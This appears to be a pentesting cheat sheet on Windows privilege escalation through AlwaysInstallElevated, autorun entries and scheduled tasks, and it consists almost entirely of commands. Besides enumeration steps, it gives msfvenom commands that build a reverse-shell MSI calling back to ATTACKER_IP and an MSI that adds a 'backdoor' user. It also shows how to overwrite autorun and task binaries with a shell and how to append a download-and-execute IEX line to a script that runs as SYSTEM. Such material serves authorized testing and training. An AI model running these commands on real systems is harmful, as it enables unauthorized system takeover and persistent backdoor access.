Documentation IndexFetch the complete documentation index at: /llms.txtUse this file to discover all available pages before exploring further.
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Privilege escalation via Windows misconfigurations: AlwaysInstallElevated, autorun, and scheduled tasks.
.msi
1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
. .\PowerUp.ps1 Get-RegistryAlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi
msfvenom -p windows/adduser USER=backdoor PASS=P@ssw0rd123! -f msi -o adduser.msi
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location
icacls "C:\Path\to\autorun.exe"
accesschk.exe /accepteula -wvu "C:\Path\to\autorun.exe"
copy shell.exe "C:\Path\to\autorun.exe"
schtasks /query /fo LIST /v
Get-ScheduledTask | Where-Object { $_.State -eq "Ready" } | ForEach-Object { $_ | Select TaskName, @{N="Action";E={$_.Actions.Execute}}, @{N="RunAs";E={$_.Principal.UserId}} }
Get-ScheduledTask | ForEach-Object { $info = $_ | Get-ScheduledTaskInfo -ErrorAction SilentlyContinue [PSCustomObject]@{ Name = $_.TaskName Action = $_.Actions.Execute RunAs = $_.Principal.UserId } } | Where-Object { $_.RunAs -match "SYSTEM|Administrator" }
icacls "C:\Path\to\scheduled_script.ps1"
# Append reverse shell to existing script Add-Content "C:\Path\to\scheduled_script.ps1" "`nIEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
copy shell.exe "C:\Path\to\scheduled_binary.exe"
icacls "C:\Path\to\task_folder\"